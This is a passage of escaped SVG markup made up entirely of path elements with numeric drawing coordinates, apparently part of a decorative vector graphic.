d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path d=\"M916.3,65.8c-.9-.6,1.5-.5,3.9.1-1-.8-3.8-.5-6.5-1.4C914.9,65.1,913.3,65.3,916.3,65.8Z\"></path>\n        <path d=\"M925.1,66a19.06,19.06,0,0,0,3.1.4c-2.7-.6,2.6.1,1.8-.4-3.6-.4-.8-.5-3.3-.9C927.8,65.9,926.1,65.9,925.1,66Z\"></path>\n        <path d=\"M920,61.2c.3-.4,1.1-.3-2.4-1.1C918.3,60.5,916.2,60.7,920,61.2Z\"></path>\n        <path d=\"M917.5,57.9c-3.7-.7-2.1.5-.6.8C918.6,58.6,916.4,58.1,917.5,57.9Z\"></path>\n        <path d=\"M949.4,62.1c-.2-.4,2.7,0,3.8-.1C948.7,61,946.5,61.3,949.4,62.1Z\"></path>\n        <path d=\"M981.6,64.9c.7-.2-3.2-1.3-4.4-1.2,2.2.4.5.6,3.2.8A3.62,3.62,0,0,0,981.6,64.9Z\"></path>\n        <path d=\"M962.6,61.5c.3-.3,3.1,0,2.7-.4C962.4,60.6,961.2,61.1,962.6,61.5Z\"></path>\n        <path d=\"M973.1,61.3c-3.2-.5-4-.4-6.1-.7a8.3,8.3,0,0,0,2.4,1C969.7,61.2,973.9,61.9,973.1,61.3Z\"></path>\n        <path d=\"M942.7,56c-.6.2-1,.9,3.7,1.7C944.9,57.1,944.5,56.6,942.7,56Z\"></path>\n        <path d=\"M936.4,54.9c-.6.3-.3.8-3.6.5,2.9.5,2,.1,4.2.7,0-.3,4.1,0,1.6-.6C937.4,55.7,938.3,55.1,936.4,54.9Z\"></path>\n        <path d=\"M987.8,63.6a23.44,23.44,0,0,0,3.5,1.4C993.1,65,992.4,64.2,987.8,63.6Z\"></path>\n        <path d=\"M1049.8,74.1a24.69,24.69,0,0,1-5.2-.8C1044.1,73.9,1053.1,74.9,1049.8,74.1Z\"></path>\n        <path d=\"M932.4,54.7c-.7-.4,4.2.1-1.4-.9C931.7,54.1,930.1,54.3,932.4,54.7Z\"></path>\n        <path d=\"M961.6,59.2c1.9.1,3.7.4,1.8-.3C960.8,58.4,959.3,58.7,961.6,59.2Z\"></path>\n        <path d=\"M994.5,63.5c.7.5,1.6,1,4.6,1.5A12.64,12.64,0,0,0,994.5,63.5Z\"></path>\n        <path d=\"M964.8,57.9c.6-.2,1.3-.4-1.4-1C964.4,57.4,960.7,57.1,964.8,57.9Z\"></path>\n        <path d=\"M966.5,55.3c.6,0,2.2-.2-.3-.6a7.46,7.46,0,0,1-2.1-.3Q964.1,54.7,966.5,55.3Z\"></path>\n        <path d=\"M970,54.5c-1.9-.4-3.2-.8-5.4-1.2-.4,1.1,15.7,2.8,7.2.9C970.4,53.9,973.4,55,970,54.5Z\"></path>\n        <path d=\"M918.1,44.8c-.4-.3-3.5.4.4.8C920.8,45.7,917.5,45,918.1,44.8Z\"></path>\n        <path d=\"M932.9,47.4c-3-.3-9.8-1.8-10.4-1.5C923.8,46,933.6,48.2,932.9,47.4Z\"></path>\n        <path 